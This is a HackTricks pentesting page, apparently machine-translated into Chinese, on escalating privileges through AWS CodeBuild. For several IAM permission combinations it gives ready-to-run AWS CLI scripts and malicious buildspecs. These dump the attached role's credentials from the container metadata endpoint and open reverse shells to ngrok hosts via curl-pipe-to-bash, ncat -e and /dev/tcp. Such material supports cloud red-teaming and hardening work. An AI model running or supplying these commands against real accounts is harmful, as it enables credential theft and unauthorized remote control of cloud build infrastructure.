AWS - Codebuild Privesc

支持 HackTricks

codebuild

获取更多信息:

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

拥有 iam:PassRole, codebuild:CreateProjectcodebuild:StartBuildcodebuild:StartBuildBatch 权限的攻击者将能够通过创建一个正在运行的项目来 提升到任何 codebuild IAM 角色的权限

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

潜在影响: 直接提升到任何 AWS Codebuild 角色。

Codebuild 容器 中,文件 /codebuild/output/tmp/env.sh 包含访问 元数据凭证 所需的所有环境变量。

该文件包含 环境变量 AWS_CONTAINER_CREDENTIALS_RELATIVE_URI,其中包含访问凭证的 URL 路径。它将类似于 /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

将其添加到 URL http://169.254.170.2/,您将能够转储角色凭证。

此外,它还包含 环境变量 ECS_CONTAINER_METADATA_URI,其中包含获取 容器元数据 的完整 URL。

iam:PassRolecodebuild:UpdateProject,(codebuild:StartBuild | codebuild:StartBuildBatch)

就像在前一节中一样,如果您可以修改而不是创建构建项目,您可以指示 IAM 角色并窃取令牌。

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

潜在影响: 直接提升到任何 AWS Codebuild 角色。

codebuild:StartBuild | codebuild:StartBuildBatch

仅凭其中一个权限就足以触发一个新的 buildspec 的构建并窃取分配给项目的 iam 角色的令牌:

cat > /tmp/builspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/builspec.yml

潜在影响: 直接提升到附加的 AWS Codebuild 角色。

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

与上一节相似,但没有 iam:PassRole 权限,您可以利用这些权限修改现有的 Codebuild 项目并访问它们已经分配的角色

REV_PATH="/tmp/codebuild_pwn.json"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"codebuild_lab_3_project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

printf "$JSON" > $REV_PATH

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build-batch --project-name codebuild-demo-project

潜在影响: 直接提升到附加的 AWS Codebuild 角色。

SSM

拥有 足够的权限来启动 ssm 会话,可以进入 正在构建的 Codebuild 项目

Codebuild 项目需要有一个断点:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

然后:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

有关更多信息,请查看文档

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

能够启动/重启特定 CodeBuild 项目的构建的攻击者,如果该项目将其 buildspec.yml 文件存储在攻击者具有写入权限的 S3 存储桶中,则可以在 CodeBuild 过程中获得命令执行权限。

注意:只有当 CodeBuild 工作人员的角色与攻击者的角色不同(希望是更高权限的角色)时,升级才是相关的。

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

您可以使用类似于这个 builspec 的东西来获取 reverse shell

buildspec.yml
version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

影响: 直接提升到 AWS CodeBuild 工作人员使用的角色,该角色通常具有高权限。

请注意,buildspec 可能以 zip 格式提供,因此攻击者需要下载、解压、修改根目录中的 buildspec.yml,然后重新压缩并上传。

更多详细信息可以在 这里 找到。

潜在影响: 直接提升到附加的 AWS Codebuild 角色。

支持 HackTricks

Last updated